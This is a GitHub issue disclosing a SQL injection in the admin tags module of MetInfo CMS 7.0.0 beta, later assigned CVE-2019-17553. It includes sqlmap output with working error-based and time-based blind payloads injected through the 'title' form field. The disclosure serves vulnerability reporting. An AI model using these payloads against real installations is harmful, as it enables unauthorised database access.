Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Vulnerability Name: Metinfo CMS Background SQL Injection Product Homepage: https://www.metinfo.cn/ Software link: https://www.metinfo.cn/upload/file/MetInfo7.0.0beta.zip Version: V7.0.0 beta
web can see the web application uses gpc to filter variables in the form. code in app/system/entrance.php:71
app/system/entrance.php:71
but the developers use the get_sql function for secondary filtering, causing escape single quotes. code in app/system/tags/admin/index.class.php:171
app/system/tags/admin/index.class.php:171
payload
attack with sqlmap
Multipart-like data found in POST data. Do you want to process it? [Y/n/q] [18:25:17] [INFO] resuming back-end DBMS 'mysql' [18:25:17] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: MULTIPART title ((custom) POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: ------WebKitFormBoundaryKV2BbPJBOgFDx0EC Content-Disposition: form-data; name="tag_name" test ------WebKitFormBoundaryKV2BbPJBOgFDx0EC Content-Disposition: form-data; name="title" test' WHERE 5805=5805 AND (SELECT 3007 FROM(SELECT COUNT(*),CONCAT(0x717a6b7071,(SELECT (ELT(3007=3007,1))),0x717a6b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- aAqw ------WebKitFormBoundaryKV2BbPJBOgFDx0EC Content-Disposition: form-data; name="keywords" test ------WebKitFormBoundaryKV2BbPJBOgFDx0EC Content-Disposition: form-data; name="description" sss ------WebKitFormBoundaryKV2BbPJBOgFDx0EC Content-Disposition: form-data; name="tag_pinyin" test ------WebKitFormBoundaryKV2BbPJBOgFDx0EC Content-Disposition: form-data; name="module" 0 ------WebKitFormBoundaryKV2BbPJBOgFDx0EC Content-Disposition: form-data; name="sort" 0 ------WebKitFormBoundaryKV2BbPJBOgFDx0EC Content-Disposition: form-data; name="tag_color" ------WebKitFormBoundaryKV2BbPJBOgFDx0EC Content-Disposition: form-data; name="tag_size" 0 ------WebKitFormBoundaryKV2BbPJBOgFDx0EC Content-Disposition: form-data; name="id" 4 ------WebKitFormBoundaryKV2BbPJBOgFDx0EC Content-Disposition: form-data; name="submit_type" save ------WebKitFormBoundaryKV2BbPJBOgFDx0EC-- Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: ------WebKitFormBoundaryKV2BbPJBOgFDx0EC Content-Disposition: form-data; name="tag_name" test ------WebKitFormBoundaryKV2BbPJBOgFDx0EC Content-Disposition: form-data; name="title" test' WHERE 2052=2052 AND SLEEP(5)-- YLsI ------WebKitFormBoundaryKV2BbPJBOgFDx0EC Content-Disposition: form-data; name="keywords" test ------WebKitFormBoundaryKV2BbPJBOgFDx0EC Content-Disposition: form-data; name="description" sss ------WebKitFormBoundaryKV2BbPJBOgFDx0EC Content-Disposition: form-data; name="tag_pinyin" test ------WebKitFormBoundaryKV2BbPJBOgFDx0EC Content-Disposition: form-data; name="module" 0 ------WebKitFormBoundaryKV2BbPJBOgFDx0EC Content-Disposition: form-data; name="sort" 0 ------WebKitFormBoundaryKV2BbPJBOgFDx0EC Content-Disposition: form-data; name="tag_color" ------WebKitFormBoundaryKV2BbPJBOgFDx0EC Content-Disposition: form-data; name="tag_size" 0 ------WebKitFormBoundaryKV2BbPJBOgFDx0EC Content-Disposition: form-data; name="id" 4 ------WebKitFormBoundaryKV2BbPJBOgFDx0EC Content-Disposition: form-data; name="submit_type" save ------WebKitFormBoundaryKV2BbPJBOgFDx0EC-- --- [18:25:25] [INFO] the back-end DBMS is MySQL web application technology: Nginx 1.15.11, PHP 5.6.9 back-end DBMS: MySQL >= 5.0
The text was updated successfully, but these errors were encountered:
CVE-2019-17553
Sorry, something went wrong.
No branches or pull requests
Vulnerability Name: Metinfo CMS Background SQL Injection
Product Homepage: https://www.metinfo.cn/
Software link: https://www.metinfo.cn/upload/file/MetInfo7.0.0beta.zip
Version: V7.0.0 beta
web can see the web application uses gpc to filter variables in the form.

code in
app/system/entrance.php:71but the developers use the get_sql function for secondary filtering, causing escape single quotes.

code in
app/system/tags/admin/index.class.php:171payload
attack with sqlmap
The text was updated successfully, but these errors were encountered: